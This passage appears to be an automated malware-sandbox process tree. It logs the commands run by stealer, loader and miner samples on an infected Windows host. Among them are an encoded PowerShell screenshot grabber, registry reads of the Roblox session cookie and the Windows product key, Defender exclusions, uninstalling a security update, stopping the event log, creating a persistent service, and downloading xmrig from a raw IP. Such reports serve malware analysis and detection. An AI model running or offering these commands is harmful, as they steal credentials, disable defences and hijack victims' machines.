gBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                          5⤵
                                                                            PID:1008
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                              6⤵
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:2864
                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ls5xhnoy\ls5xhnoy.cmdline"
                                                                                7⤵
                                                                                  PID:5548
                                                                                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES625B.tmp" "c:\Users\Admin\AppData\Local\Temp\ls5xhnoy\CSC9FCE6760DFC5438BB875B61C5EF1A6E2.TMP"
                                                                                    8⤵
                                                                                      PID:5772
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                5⤵
                                                                                  PID:5204
                                                                                  • C:\Windows\system32\tree.com
                                                                                    tree /A /F
                                                                                    6⤵
                                                                                      PID:5400
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                    5⤵
                                                                                      PID:5232
                                                                                      • C:\Windows\system32\attrib.exe
                                                                                        attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                        6⤵
                                                                                        • Drops file in Drivers directory
                                                                                        • Views/modifies file attributes
                                                                                        PID:5384
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                      5⤵
                                                                                        PID:5436
                                                                                        • C:\Windows\system32\attrib.exe
                                                                                          attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                          6⤵
                                                                                          • Drops file in Drivers directory
                                                                                          • Views/modifies file attributes
                                                                                          PID:5576
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                        5⤵
                                                                                          PID:5476
                                                                                          • C:\Windows\system32\tree.com
                                                                                            tree /A /F
                                                                                            6⤵
                                                                                              PID:5608
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                            5⤵
                                                                                              PID:5616
                                                                                              • C:\Windows\system32\tasklist.exe
                                                                                                tasklist /FO LIST
                                                                                                6⤵
                                                                                                • Enumerates processes with tasklist
                                                                                                PID:5712
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                              5⤵
                                                                                                PID:5660
                                                                                                • C:\Windows\system32\tree.com
                                                                                                  tree /A /F
                                                                                                  6⤵
                                                                                                    PID:5756
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                  5⤵
                                                                                                    PID:5796
                                                                                                    • C:\Windows\system32\tree.com
                                                                                                      tree /A /F
                                                                                                      6⤵
                                                                                                        PID:5864
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                      5⤵
                                                                                                        PID:5880
                                                                                                        • C:\Windows\system32\tree.com
                                                                                                          tree /A /F
                                                                                                          6⤵
                                                                                                            PID:5940
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3920"
                                                                                                          5⤵
                                                                                                            PID:5988
                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                              taskkill /F /PID 3920
                                                                                                              6⤵
                                                                                                              • Kills process with taskkill
                                                                                                              PID:6040
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3920"
                                                                                                            5⤵
                                                                                                              PID:6072
                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                taskkill /F /PID 3920
                                                                                                                6⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:5168
                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                              5⤵
                                                                                                                PID:5228
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  6⤵
                                                                                                                    PID:4272
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                    6⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5304
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                  5⤵
                                                                                                                    PID:5492
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                      6⤵
                                                                                                                        PID:5560
                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                      5⤵
                                                                                                                        PID:5488
                                                                                                                        • C:\Windows\system32\getmac.exe
                                                                                                                          getmac
                                                                                                                          6⤵
                                                                                                                            PID:1972
                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI47362\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\flhYB.zip" *"
                                                                                                                          5⤵
                                                                                                                            PID:5672
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              6⤵
                                                                                                                                PID:5660
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI47362\rar.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\_MEI47362\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\flhYB.zip" *
                                                                                                                                6⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5584
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                                                                              5⤵
                                                                                                                                PID:5904
                                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                  wmic os get Caption
                                                                                                                                  6⤵
                                                                                                                                    PID:3964
                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                                                                                                  5⤵
                                                                                                                                    PID:2996
                                                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                      wmic computersystem get totalphysicalmemory
                                                                                                                                      6⤵
                                                                                                                                        PID:5928
                                                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                                                                      5⤵
                                                                                                                                        PID:5128
                                                                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                          wmic csproduct get uuid
                                                                                                                                          6⤵
                                                                                                                                            PID:5080
                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                                                                                          5⤵
                                                                                                                                            PID:1640
                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                              6⤵
                                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                                              PID:2904
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                            5⤵
                                                                                                                                              PID:5732
                                                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                                                wmic path win32_VideoController get name
                                                                                                                                                6⤵
                                                                                                                                                • Detects videocard installed
                                                                                                                                                PID:5644
                                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                              5⤵
                                                                                                                                                PID:2908
                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                  6⤵
                                                                                                                                                    PID:5992
                                                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Built.exe""
                                                                                                                                                  5⤵
                                                                                                                                                  • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                  PID:2016
                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                    ping localhost -n 3
                                                                                                                                                    6⤵
                                                                                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                                    • Runs ping.exe
                                                                                                                                                    PID:5680
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\onedrive.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\onedrive.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              PID:3428
                                                                                                                                              • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                                                                                                4⤵
                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                PID:1420
                                                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                4⤵
                                                                                                                                                  PID:5152
                                                                                                                                                  • C:\Windows\system32\wusa.exe
                                                                                                                                                    wusa /uninstall /kb:890830 /quiet /norestart
                                                                                                                                                    5⤵
                                                                                                                                                      PID:2184
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe delete "KOPWGCIF"
                                                                                                                                                    4⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:5136
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe create "KOPWGCIF" binpath= "C:\ProgramData\gfmqvycsvzww\vsrumanlxdbr.exe" start= "auto"
                                                                                                                                                    4⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:4268
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe stop eventlog
                                                                                                                                                    4⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:6084
                                                                                                                                                  • C:\Windows\system32\sc.exe
                                                                                                                                                    C:\Windows\system32\sc.exe start "KOPWGCIF"
                                                                                                                                                    4⤵
                                                                                                                                                    • Launches sc.exe
                                                                                                                                                    PID:5172
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp1_4363463463464363463463463.zip\4363463463464363463463463.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Temp1_4363463463464363463463463.zip\4363463463464363463463463.exe"
                                                                                                                                              1⤵
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:2428
                                                                                                                                              • C:\Windows\SysWOW64\Files\CollosalLoader.exe
                                                                                                                                                "C:\Windows\System32\Files\CollosalLoader.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:3012
                                                                                                                                              • C:\Windows\SysWOW64\Files\Client-built.exe
                                                                                                                                                "C:\Windows\System32\Files\Client-built.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                PID:4396
                                                                                                                                              • C:\Windows\SysWOW64\Files\mimikatz.exe
                                                                                                                                                "C:\Windows\System32\Files\mimikatz.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:3948
                                                                                                                                              • C:\Windows\SysWOW64\Files\imagelogger.exe
                                                                                                                                                "C:\Windows\System32\Files\imagelogger.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Drops startup file
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4320
                                                                                                                                              • C:\Windows\SysWOW64\Files\kisteruop.exe
                                                                                                                                                "C:\Windows\System32\Files\kisteruop.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:752
                                                                                                                                              • C:\Windows\SysWOW64\Files\Client-built-Playit.exe
                                                                                                                                                "C:\Windows\System32\Files\Client-built-Playit.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4740
                                                                                                                                              • C:\Windows\SysWOW64\Files\idrB5Event.exe
                                                                                                                                                "C:\Windows\System32\Files\idrB5Event.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5124
                                                                                                                                              • C:\Windows\SysWOW64\Files\TT18.exe
                                                                                                                                                "C:\Windows\System32\Files\TT18.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Checks computer location settings
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2396
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\H63zRQfe'"
                                                                                                                                                  3⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:4200
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\H63zRQfe
                                                                                                                                                    4⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:5616
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
                                                                                                                                                  3⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:4016
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Windows
                                                                                                                                                    4⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:620
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  "powershell.exe" powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                                                                                                                                                  3⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:1520
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\Users
                                                                                                                                                    4⤵
                                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:1092
                                                                                                                                                • C:\H63zRQfe\77iYF1Hwa.exe
                                                                                                                                                  "C:\H63zRQfe\77iYF1Hwa.exe"
                                                                                                                                                  3⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:8
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Temp2_New Text Document mod.exse.zip\New Text Document mod.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Temp2_New Text Document mod.exse.zip\New Text Document mod.exe"
                                                                                                                                              1⤵
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:3064
                                                                                                                                              • C:\Windows\System32\a\winvnc.exe
                                                                                                                                                "C:\Windows\System32\a\winvnc.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:3536
                                                                                                                                              • C:\Windows\System32\a\Bootxr.exe
                                                                                                                                                "C:\Windows\System32\a\Bootxr.exe"
                                                                                                                                                2⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Adds Run key to start application
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:2080
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
                                                                                                                                                  3⤵
                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                  PID:448
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /c powershell Invoke-WebRequest -Uri http://45.125.67.168/stelin/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
